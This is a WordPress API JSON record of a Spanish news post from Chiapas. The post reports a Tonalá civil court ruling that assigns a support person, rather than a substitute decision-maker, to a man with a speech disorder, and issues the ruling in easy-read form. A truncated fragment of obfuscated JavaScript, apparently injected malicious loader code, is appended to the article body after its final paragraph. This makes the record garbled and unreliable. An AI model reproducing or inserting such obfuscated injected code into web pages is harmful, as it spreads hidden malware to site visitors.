{"id":23470,"date":"2025-08-14T03:27:26","date_gmt":"2025-08-14T03:27:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23470"},"modified":"2025-08-14T03:27:30","modified_gmt":"2025-08-14T03:27:30","slug":"sentencias-humanistas-fortalecen-el-acceso-a-la-justicia-para-las-personas-con-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23470","title":{"rendered":"Sentencias humanistas fortalecen el acceso a la justicia para las personas con discapacidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709-1024x682.jpg\" alt=\"\" class=\"wp-image-23471\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000276709.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>13 de agosto del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Juzgado Segundo del Ramo Civil del distrito judicial de Tonal\u00e1, dict\u00f3 una sentencia que determin\u00f3 la designaci\u00f3n de apoyos y salvaguardias para que una persona con discapacidad pueda tomar sus propias decisiones de vida.<\/p>\n\n\n\n<p>Tras conocer los hechos, la persona juzgadora determin\u00f3 designar que Roberto \u201cN\u201d tuviera como persona de apoyo a Francisco \u201cN\u201d, a quien se le confiri\u00f3 el cargo de su tutor leg\u00edtimo, no para que lo sustituya en su voluntad sino para que pueda ejecutar por \u00e9l las acciones que le resulten imposibles por s\u00ed mismo, derivado de su situaci\u00f3n de dislalia (trastorno del habla que se caracteriza por la dificultad para pronunciar correctamente ciertos sonidos o palabras, afectando la articulaci\u00f3n del lenguaje).<\/p>\n\n\n\n<p>Por ello, esta sentencia tambi\u00e9n fue presentada en un formato de lectura f\u00e1cil que permiti\u00f3 a la persona juzgadora tener la certeza de que Roberto &#8220;N&#8221; comprendi\u00f3 plenamente el contenido y la resoluci\u00f3n dictada, al haberse tomado en cuenta su voluntad, as\u00ed como sus necesidades espec\u00edficas como una persona con discapacidad.<\/p>\n\n\n\n<p>Estas sentencias evidencian que al interior de la casa de la justicia se priorizan acciones sustantivas para la aplicaci\u00f3n del humanismo en el ejercicio jurisdiccional, garantizando que las decisiones no solo resuelvan conflictos, sino que tambi\u00e9n promuevan la inclusi\u00f3n, la equidad y el bienestar integral de las y los involucrados en una controversia judicial, tal como lo ha impulsado el magistrado presidente Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>El Poder Judicial del Estado reafirma su compromiso con una justicia m\u00e1s humana, cercana, comprensible y emp\u00e1tica, que reconoce la dignidad de todas las personas y pone en el centro sus necesidades, capacidades y derechos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 13 de agosto del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Juzgado Segundo del Ramo Civil del distrito judicial de Tonal\u00e1, dict\u00f3 una sentencia que determin\u00f3 la designaci\u00f3n de apoyos y salvaguardias para que una persona con discapacidad pueda tomar sus propias decisiones de vida. Tras conocer los hechos, la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23471,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23470","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23470","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23470"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23470\/revisions"}],"predecessor-version":[{"id":23472,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23470\/revisions\/23472"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23471"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23470"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23470"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}